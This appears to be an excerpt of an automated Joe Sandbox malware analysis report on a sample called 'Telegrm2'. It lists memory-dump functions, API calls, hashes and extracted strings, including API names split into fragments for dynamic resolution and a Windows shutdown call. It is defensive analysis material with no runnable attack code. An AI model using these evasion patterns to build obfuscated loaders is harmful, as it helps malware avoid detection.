                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _get_daylight
                                            • String ID:
                                            • API String ID: 4143689357-0
                                            • Opcode ID: b43875ae3d155f59fd31952636780625fee8c62a4db5b3f3ddbd55815cc4839e
                                            • Instruction ID: c1ef7db67ec38d4cb2f7050ce009f12dc50cff2303aa98966d3fe9d1f9afa91a
                                            • Opcode Fuzzy Hash: b43875ae3d155f59fd31952636780625fee8c62a4db5b3f3ddbd55815cc4839e
                                            • Instruction Fuzzy Hash: 90912871B146064FE71CDE28CC926B5B7DAF799304F24913ED987CB795EA30E902CA81
                                            Function 02DC9BFC Relevance: 3.2, APIs: 2, Instructions: 240COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _set_error_mode
                                            • String ID:
                                            • API String ID: 1949149715-0
                                            • Opcode ID: 4a6ef05bb1344ac240cbe714e762fe31f78d8db34911ef9df8dbf64b02ac3932
                                            • Instruction ID: 00d51df7a05832dc3b7b57545923a6de270650655affb8ca99304757ef18cef5
                                            • Opcode Fuzzy Hash: 4a6ef05bb1344ac240cbe714e762fe31f78d8db34911ef9df8dbf64b02ac3932
                                            • Instruction Fuzzy Hash: FA51C871318A4A4BDB6CEF38E86927A73D6FB98304F20452ED44BD3395EF34D9058A46
                                            Function 030B7938 Relevance: 3.2, APIs: 2, Instructions: 235COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _get_daylight.LIBCMT ref: 030B7BAA
                                              • Part of subcall function 030B8224: _errno.LIBCMT ref: 030B822D
                                              • Part of subcall function 030B8224: _invalid_parameter_noinfo.LIBCMT ref: 030B8238
                                            • _get_daylight.LIBCMT ref: 030B7C30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _get_daylight$_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3559991230-0
                                            • Opcode ID: b43875ae3d155f59fd31952636780625fee8c62a4db5b3f3ddbd55815cc4839e
                                            • Instruction ID: 1776161daf6bf9eb75efd1e1030ea769971fc4a32a5028d46995b6e148fe783c
                                            • Opcode Fuzzy Hash: b43875ae3d155f59fd31952636780625fee8c62a4db5b3f3ddbd55815cc4839e
                                            • Instruction Fuzzy Hash: 64815B72B116458BC75DCF29ED91BD8B6AAF7E4704F489135DE06CBB94EB34E6008B40
                                            Function 030BCC80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030BCCA7
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            • GetLocaleInfoA.KERNEL32 ref: 030BCCDC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocale_amsg_exit_getptd
                                            • String ID:
                                            • API String ID: 488165793-0
                                            • Opcode ID: 9bd94aef9cfee611d8c2396a10f94f8a8be772f0d596232e10a805eb6e7651ba
                                            • Instruction ID: 2ec921074b79fa3b816cea671cf7e9f8f9f77aba62bda631e8553a74dcc50843
                                            • Opcode Fuzzy Hash: 9bd94aef9cfee611d8c2396a10f94f8a8be772f0d596232e10a805eb6e7651ba
                                            • Instruction Fuzzy Hash: 6611AC36701BC496EB29CB65E8593DAB3B8F388B80F484126CA598B714DB38E525CB40
                                            Function 030B6A70 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030B6AAA
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                              • Part of subcall function 030B739C: _errno.LIBCMT ref: 030B73B4
                                              • Part of subcall function 030B739C: _invalid_parameter_noinfo.LIBCMT ref: 030B73C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1050512615-0
                                            • Opcode ID: 187c8c2090fb1ef09b6e861da4a2a9321d9a5f067c9fbbd897895a05611d2099
                                            • Instruction ID: 0505c9bce0b26d2ba3fdd8419ed6e200a198ea61e82e78f1a2d9fd01bbc2964a
                                            • Opcode Fuzzy Hash: 187c8c2090fb1ef09b6e861da4a2a9321d9a5f067c9fbbd897895a05611d2099
                                            • Instruction Fuzzy Hash: 6751F96631678542EB64DB22A6607FBA7B5FBD5BC4F4884259F494BB08DF3AC141C700
                                            Function 030BCD68 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: ef0ae90558a2563977780bc8b992b878a5525057e93b521f65adeab4ce995e93
                                            • Instruction ID: 44c1d650b15d3a5663e7e5a31ce1dc5f3e2d881cedc07bbc5a13f6a56266e9ef
                                            • Opcode Fuzzy Hash: ef0ae90558a2563977780bc8b992b878a5525057e93b521f65adeab4ce995e93
                                            • Instruction Fuzzy Hash: 1601B13A712A8186E764DB2AA4502ED6BB8E3C4FC4F4D8521EB9A4B715CA25C9838344
                                            Function 030BD1F8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumSystemLocalesA.KERNEL32 ref: 030BD248
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: EnumLocalesSystem
                                            • String ID:
                                            • API String ID: 2099609381-0
                                            • Opcode ID: 489544c5c1561f8a60114285fa019722ad62f90afbd21461303d513425ade99a
                                            • Instruction ID: 5b10a6ff1fad450a49ee7c78e062c01581953c62eba11cb7e8dd8924fadec643
                                            • Opcode Fuzzy Hash: 489544c5c1561f8a60114285fa019722ad62f90afbd21461303d513425ade99a
                                            • Instruction Fuzzy Hash: D501D6766017448BFB59DF30C0553EAB7F1F7A4B0DF088415CA8906698C7B8C695C780
                                            Function 030BD290 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumSystemLocalesA.KERNEL32 ref: 030BD2C5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: EnumLocalesSystem
                                            • String ID:
                                            • API String ID: 2099609381-0
                                            • Opcode ID: bc37c9b42174135312cbea834ff9070d3af06bb7d383e6c7897b2d83843f5dbd
                                            • Instruction ID: 4bff5f04500b2fe5e606dd9e5236b7e58d3b5e922630b4ca8ac0c7679f01a458
                                            • Opcode Fuzzy Hash: bc37c9b42174135312cbea834ff9070d3af06bb7d383e6c7897b2d83843f5dbd
                                            • Instruction Fuzzy Hash: F8F02B66B02A844BF719CF31C4253EAA7F2E7E4B09F1CC421CB8907385CBB8C1D28244
                                            Function 030B38A4 Relevance: 1.5, APIs: 1, Instructions: 22timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 030B38B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Time$FileSystem
                                            • String ID:
                                            • API String ID: 2086374402-0
                                            • Opcode ID: c55edd093e6a67b87af22172e2d563261f7e87cdd571db8748090715beb8a893
                                            • Instruction ID: 265ea95162407b6c5f79472a147feebf6538151dd285a5a1ff99bb0a8ef818b4
                                            • Opcode Fuzzy Hash: c55edd093e6a67b87af22172e2d563261f7e87cdd571db8748090715beb8a893
                                            • Instruction Fuzzy Hash: B5E0D8E2B25A4842EE11DB19E415359A291FF18FF0E04E3319E790EBE8EB1CC0514300
                                            Function 030AE6F6 Relevance: 1.5, APIs: 1, Instructions: 12shutdownCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030A2DB0: LoadLibraryA.KERNEL32 ref: 030A2DE1
                                              • Part of subcall function 030A2DB0: GetProcAddress.KERNEL32 ref: 030A2DF4
                                              • Part of subcall function 030A2DB0: GetProcAddress.KERNEL32 ref: 030A2E07
                                              • Part of subcall function 030A2DB0: GetProcAddress.KERNEL32 ref: 030A2E1A
                                              • Part of subcall function 030A2DB0: LoadLibraryA.KERNEL32 ref: 030A2E2A
                                              • Part of subcall function 030A2DB0: GetProcAddress.KERNEL32 ref: 030A2E3D
                                              • Part of subcall function 030A2DB0: LoadLibraryA.KERNEL32 ref: 030A2EA6
                                              • Part of subcall function 030A2DB0: GetProcAddress.KERNEL32 ref: 030A2EB6
                                              • Part of subcall function 030A2DB0: CloseHandle.KERNEL32 ref: 030A2ECC
                                              • Part of subcall function 030A2DB0: FreeLibrary.KERNEL32 ref: 030A2EDA
                                              • Part of subcall function 030A2DB0: FreeLibrary.KERNEL32 ref: 030A2EE8
                                            • ExitWindowsEx.USER32 ref: 030AE706
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                            • String ID:
                                            • API String ID: 3789203340-0
                                            • Opcode ID: b68418adac8e66983115cef8cbfa72da0d8c9e8de32800c15d5dd586479a703b
                                            • Instruction ID: d40f6d7a803196a0f6d7e82c0f2f63cc45c80e771422c88a13f69af3aa35a8af
                                            • Opcode Fuzzy Hash: b68418adac8e66983115cef8cbfa72da0d8c9e8de32800c15d5dd586479a703b
                                            • Instruction Fuzzy Hash: EDD0235131999041D3055B75B0303FD6355D78C751F098435AF4709547CC7CC1408740
                                            Function 02DBD42B Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: <
                                            • API String ID: 0-4251816714
                                            • Opcode ID: 73098f46f60a16aae0a72572a1ec70f99aad56feaba569bcaf3d060d2753bf39
                                            • Instruction ID: eeb4387ad5575cf6fa5cf921ab58f67ee0049af2d503ebb3da3d407ebce2c62c
                                            • Opcode Fuzzy Hash: 73098f46f60a16aae0a72572a1ec70f99aad56feaba569bcaf3d060d2753bf39
                                            • Instruction Fuzzy Hash: AA516E30709A488FEB45EF28E859BA977E2FB95319F00851EE44BC3661DB39D845CB42
                                            Function 030B664C Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CurrentProcess
                                            • String ID: _.,
                                            • API String ID: 2050909247-2709443920
                                            • Opcode ID: 0e7019ad77b11a3fd7c5fb922a025f2c5f7fe516fc606dd4fbed53498454cb13
                                            • Instruction ID: 99695073e75dca0eaf172134d0cbab0c8aa597867f9a0f1d3afa1e7a954cfbca
                                            • Opcode Fuzzy Hash: 0e7019ad77b11a3fd7c5fb922a025f2c5f7fe516fc606dd4fbed53498454cb13
                                            • Instruction Fuzzy Hash: 8C414D2620278947EB74DE71D855BEB67B1E785784F4C896ACF894BA80DF3AC001C300
                                            Function 02DB1D38 Relevance: .4, Instructions: 364COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0dab8ebfa01812288c2bd50781cb84577b5c6f6cad01aab0e39859907a87239e
                                            • Instruction ID: 3cfd25ee1fca93b853fdfa934caf35682efd676b83820993ffe33f4eeb0fea00
                                            • Opcode Fuzzy Hash: 0dab8ebfa01812288c2bd50781cb84577b5c6f6cad01aab0e39859907a87239e
                                            • Instruction Fuzzy Hash: 29B18031618E098BCB1ADF2CC4A96B9B3E1FF59705B104669D89BC7645DB70EC52CBC0
                                            Function 02DC1E58 Relevance: .3, Instructions: 347COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05a5092d5cc288cda86c73315a18dfdcc9fc45c27ff5f31e837379ae7296e616
                                            • Instruction ID: 61ac2aa76ed8273799c9cb599cea6992ece216189febfe757d7cb719cd4260ff
                                            • Opcode Fuzzy Hash: 05a5092d5cc288cda86c73315a18dfdcc9fc45c27ff5f31e837379ae7296e616
                                            • Instruction Fuzzy Hash: 15A10730214E4A4FDB58EB18C49876577E2FB98315F74426EE88AC7396DB35DC82CB81
                                            Function 02DB1838 Relevance: .3, Instructions: 322COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61aec3bdabeeadfbc1d8e5710c9ac84fee701a44b258acd76909b7ab279bb187
                                            • Instruction ID: 8ee6745a2154eb4635df8e1d993f8f7ec4d06641343eecb8995b3796c037d880
                                            • Opcode Fuzzy Hash: 61aec3bdabeeadfbc1d8e5710c9ac84fee701a44b258acd76909b7ab279bb187
                                            • Instruction Fuzzy Hash: AEA16D30618E469FD74EEB39D4656A5B7A1FF5A309B104229E48BC3641DB24F862CBC1
                                            Function 02DB3EE8 Relevance: .2, Instructions: 218COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b81d4822c4807a28f12dd8b260e015ce51efabee9554ea12fc3a4bfb19bb2c28
                                            • Instruction ID: d56716abfac0d25e66b1757a61fdcb44f49f15f8a14bedc28339f545d9153494
                                            • Opcode Fuzzy Hash: b81d4822c4807a28f12dd8b260e015ce51efabee9554ea12fc3a4bfb19bb2c28
                                            • Instruction Fuzzy Hash: 31618831618A488FD769EF34D8687AA77E2FB98310F60456ED44BC32A1DF38D901CB41
                                            Function 02DC6004 Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0a9c087c29423ca0a5297be30a63c1d1af4924b03ac0995c240b3f4ccd4690
                                            • Instruction ID: 9be56ff6dc9db1ab4741e9cbf64c783ffb6e820f6be0e1347b12b01af1f9d9b5
                                            • Opcode Fuzzy Hash: 5e0a9c087c29423ca0a5297be30a63c1d1af4924b03ac0995c240b3f4ccd4690
                                            • Instruction Fuzzy Hash: 5041E730618A4A8FEB29EF3488453BA72D6FBC4315F35892D8587C7341DF24DC429AC1
                                            Function 030C5CC0 Relevance: .2, Instructions: 173COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                                            • Instruction ID: b0682731590f89f9a479e1cdeaea33a3559e15879cfb6ea0ea6f14047fe6fdd0
                                            • Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                                            • Instruction Fuzzy Hash: C651F27AB262E18BD768CF19E818F6D7AA9F394385B65D03CDB1287F00D676D850CB40
                                            Function 030C6520 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: 1b2ac426b75d544ccb6c8ec0318c5a96a7e95e72bbb5ce310526efaa43ac1cae
                                            • Instruction ID: 7904839c97d216a3d41d3f8d5b0bf3f2e24103bad6a103521e50cecd31ab5357
                                            • Opcode Fuzzy Hash: 1b2ac426b75d544ccb6c8ec0318c5a96a7e95e72bbb5ce310526efaa43ac1cae
                                            • Instruction Fuzzy Hash: BC316F76612B44CAD71CEF72E8513AE23B5EBD8784F18D839AA895F708CF79C0128740
                                            Function 02DCB0FC Relevance: 107.8, APIs: 86, Instructions: 270COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction ID: acef7099a182798242538fc9c0f97306e8b3533773ef18ebb13e8f8e752c17ad
                                            • Opcode Fuzzy Hash: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction Fuzzy Hash: F2A153302A158A8BD7C9FFA5C8E47E86352FB48340F9481F9C89D8B366CE525C49CB61
                                            Function 030BB744 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1012874770-0
                                            • Opcode ID: ee57294937ec00a78bb68957dfb700f4bc262173795e00b3005a12635d34ccb0
                                            • Instruction ID: 1f0694cf5c08da7ec3e1e8bc52626b64ad7fb29b77ff07548e559ea57375a471
                                            • Opcode Fuzzy Hash: ee57294937ec00a78bb68957dfb700f4bc262173795e00b3005a12635d34ccb0
                                            • Instruction Fuzzy Hash: AB81542E312648A5DB41FB31FCA42EE2331EFC6FC5F9469728A4DAF624CE20D8458350
                                            Function 030A32F0 Relevance: 42.1, APIs: 4, Strings: 20, Instructions: 69libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: .dll$File$File$GetS$Kern$Time$Time$Time$ToLo$ToSy$calF$eAsF$el32$ileT$ileT$ime$ime$mTim$stem$yste
                                            • API String ID: 2238633743-1498238681
                                            • Opcode ID: ff00a95b1e228d669d7c747e6a3e4753806e95f8e25970bfa9467526f097a296
                                            • Instruction ID: cabbe226aad61bbc895ef39c833591bb8c80f6c61b6c31a5c67625f14ef9599e
                                            • Opcode Fuzzy Hash: ff00a95b1e228d669d7c747e6a3e4753806e95f8e25970bfa9467526f097a296
                                            • Instruction Fuzzy Hash: A43125B6711A42DEEB40CFA5E59539C7B74F748B88F40951AEA0D1FB18DA34C24ACB48
                                            Function 030BE7CC Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryW.KERNEL32(0000000D,030B4A1B,?,?,?,030B30B6), ref: 030BE811
                                            • GetProcAddress.KERNEL32(?,?,?,030B30B6), ref: 030BE82D
                                            • RtlEncodePointer.NTDLL ref: 030BE83F
                                            • GetProcAddress.KERNEL32(?,?,?,030B30B6), ref: 030BE856
                                            • RtlEncodePointer.NTDLL ref: 030BE85F
                                            • GetProcAddress.KERNEL32(?,?,?,030B30B6), ref: 030BE876
                                            • RtlEncodePointer.NTDLL ref: 030BE87F
                                            • GetProcAddress.KERNEL32(?,?,?,030B30B6), ref: 030BE896
                                            • RtlEncodePointer.NTDLL ref: 030BE89F
                                            • GetProcAddress.KERNEL32(?,?,?,030B30B6), ref: 030BE8BE
                                            • RtlEncodePointer.NTDLL ref: 030BE8C7
                                            • RtlDecodePointer.NTDLL ref: 030BE8FA
                                            • RtlDecodePointer.NTDLL ref: 030BE90A
                                            • RtlDecodePointer.NTDLL ref: 030BE960
                                            • RtlDecodePointer.NTDLL ref: 030BE981
                                            • RtlDecodePointer.NTDLL ref: 030BE99B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                            • API String ID: 2643518689-564504941
                                            • Opcode ID: 95b266977d76656106561633bc7faa547569528cb1263d08bae6a5b9fb0e8bbf
                                            • Instruction ID: edf2e61dbf800be4b23c03b646d69d6dee25ea9104fa3fa957c911240b248dcf
                                            • Opcode Fuzzy Hash: 95b266977d76656106561633bc7faa547569528cb1263d08bae6a5b9fb0e8bbf
                                            • Instruction Fuzzy Hash: D6512C64617B4181EEA6DB56F8A43A463F8BB49F90F486629DD4E07760EF3CC249C344
                                            Function 030A3160 Relevance: 38.6, APIs: 6, Strings: 16, Instructions: 86libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: .dll$Adva$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$pi32$ship
                                            • API String ID: 2574300362-3843195497
                                            • Opcode ID: 04621738c0442ffbcc8d80509db345bcb3724ddbb18c76e5f94587bdcebbe584
                                            • Instruction ID: b2850db333c7d1335b65fefb58784b886f855042c4b825b03b3b98004d378e4f
                                            • Opcode Fuzzy Hash: 04621738c0442ffbcc8d80509db345bcb3724ddbb18c76e5f94587bdcebbe584
                                            • Instruction Fuzzy Hash: F5417572605B41DED710CFA1E0A039DBBB4F748788F40511AEA4C5BB18DF78C219CB48
